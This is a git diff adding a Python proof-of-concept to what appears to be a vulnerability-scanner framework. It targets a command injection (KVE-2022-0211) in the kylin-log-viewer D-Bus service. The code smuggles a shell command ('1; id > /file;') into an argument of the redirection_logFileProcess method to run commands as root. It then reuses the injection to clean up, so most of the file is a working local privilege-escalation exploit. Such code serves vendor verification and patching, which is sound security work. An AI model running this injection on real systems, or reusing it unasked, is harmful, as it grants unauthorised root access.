diff --git a/pocs/kp_2022_0024_logfileprocess_command_injection.py b/pocs/kp_2022_0024_logfileprocess_command_injection.py new file mode 100644 index 0000000000000000000000000000000000000000..21226a9ee3edd6f2779ea08ccfa1d649f5d0cefb --- /dev/null +++ b/pocs/kp_2022_0024_logfileprocess_command_injection.py @@ -0,0 +1,84 @@ +from utils import highlight,tree,error +from lib.core.basic import BasePoc +import dbus + +POC_NAME = 'LogFileProcessCommandInjection' + +class LogFileProcessCommandInjection(BasePoc): + poc_info = { + # 尽量添加以下内容 + 'poc': { + 'Id': 'kp_2022_0024', # poc编号,命名规范为kp_2022_0001_*.py + 'kve': "KVE-2022-0211", # kve id + 'ZenTaoID': "108070", # 禅道ID + 'Name': r'麒麟日志管理服务的redirection_logFileProcess方法存在命令注入漏洞', # poc名称 + 'Author': 'shixinling', # poc作者 + 'Create_date': '2022-03-22', # poc创建时间:如'2014-11-19' + }, + 'vul': { + 'Product': 'kylin-log-viewer', # 漏洞所在产品名称 + 'Version': r'低于3.1.12版本', # 产品的版本号 + 'Type': r'命令注入', # 漏洞类型 + 'Severity': 'High', # Bug severity + 'Description': r'com.kylin.logview.redirection_logFileProcess方法存在命令注入,可直接导致本地权限提升', # 漏洞介绍 + 'DisclosureDate': '2022-02-28', # poc公布时间:如'2014-11-19' + 'ZenTaoURL':'暂不公开', #禅道链接 + 'RepairSolution':r'目前此漏洞已经推出离线补丁包,补丁包下载地址为:http://dev.kylinos.cn:8004/files/kylin-log-viewer/SP1_SP2/,或待该离线补丁包被推送至外网源后,使用apt upgrade kylin-log-viewer完成更新。', #修复方案 + } + } + + scan_info = { + 'Target': '', + 'TaskId': '', + 'Mode': 'verify', # verify或exploit, 默认值为verify + 'Verbose': False, # 是否打印详细信息,默认值为False + 'Error': '', # 记录poc失败信息 + 'Success': False, # 是否执行成功,默认值为False表示poc执行不成功,若成功请更新该值为True + 'Ret': tree() # 记录额外的poc相关信息 + } + + test_case = { + 'Need_fb': False, + 'Vuln': [], # 列表格式的测试版本 + 'Not_vuln': [], # 同上 + } + + def verify(self, first=False): + # 漏洞验证方法(mode=verify) + target = self.scan_info.get("Target", "") # 获取测试目标 + verbose = self.scan_info.get("Verbose", False) # 是否打印详细信息 + flag_str = '' #漏洞成立时的特征字符串 + flag_list = [] #漏洞成立时的特征列表 + + # 以下是PoC的检测逻辑 + print('testing if {} vulnerability'.format(self.poc_info["poc"]["Name"])) + FileName = self.get_random_str(8) + '.txt' + service = 'com.kylin.logview' + path = '/logfile' + interface = 'com.kylin.logview' + try: + bus = dbus.SystemBus() + obj = bus.get_object(service, path) + proxy = dbus.Interface(obj, interface) + cmd = "id > /{};".format(FileName) + proxy.redirection_logFileProcess(('a', 'b', 0, 'c', f'1; {cmd}', 1), signature='(ssissi)') + file_object = open('/{}'.format(FileName)) + flag_str = file_object.read() + file_object.close() + # 下是PoC的判断逻辑 + if "uid=0(root)" in flag_str or "groups=0" in flag_str: + msg = r'本机 ( {} ) 存在 {} (禅道ID : {} ) 。 漏洞描述 : {} '.format(self.scan_info['Target'],self.poc_info["poc"]["Name"],self.poc_info["poc"]["ZenTaoID"],self.poc_info["vul"]["Description"]) + print(msg) + cmd = "rm /{};".format(FileName) + proxy.redirection_logFileProcess(('a', 'b', 0, 'c', f'1; {cmd}', 1), signature='(ssissi)') + self.scan_info['Success'] = True # 漏洞存在,必须将该字段更新为True(必须) + self.scan_info['Ret']['VerifyInfo']['Target'] = 'localhost' # 记录漏洞相关的一些额外信息(可选) + self.scan_info['Ret']['VerifyInfo']['DATA'] = msg + if verbose: + highlight('[*] {} vul found'.format(self.poc_info["poc"]["Name"])) # 打印高亮信息发现漏洞,其他可用方法包括info()/warn()/error()/highlight()方法分别打印不同等级的信息 + except Exception as e: + error('[*] {} vul running error : {}'.format(self.poc_info["poc"]["Name"],str(e))) + + def exploit(self, first=False): + # 漏洞利用方法(mode=verify) + self.verify(first=first)